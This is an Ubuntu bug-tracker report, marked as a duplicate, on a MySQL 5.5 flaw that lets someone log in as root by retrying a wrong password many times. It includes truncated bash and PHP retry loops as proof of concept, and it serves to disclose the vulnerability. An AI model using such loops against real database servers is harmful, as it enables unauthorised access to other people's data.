mysql login possible without knowing password
Bug #1011602 reported by
sseitz
This bug report is a duplicate of:
Bug #1011371: mysql 5.5.24, 5.1.63, 5.0.x security update tracking bug.
Edit
Remove
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
mysql-5.5 (Ubuntu) |
New
|
Undecided
|
Unassigned |
Bug Description
Running Ubuntu 12.04 LTS 64bit, it's possible to get access to mysql (mysql-server 5.5.22-0ubuntu1) by only knowing a username.
I've tested on a few different distributions/
I tried that bash line:
for i in `seq 1 1000`; do mysql -u root --password=
also a few lines of php work the very same way:
<?php
$n=0;
while (!$db=@
echo 'got it after '.$n." trials\r\n";
I assume this is a big security problem.
visibility: | private → public |
To post a comment you must log in.
Forgot to add the original post which made me aware of the bug:
http:// seclists. org/oss- sec/2012/ q2/493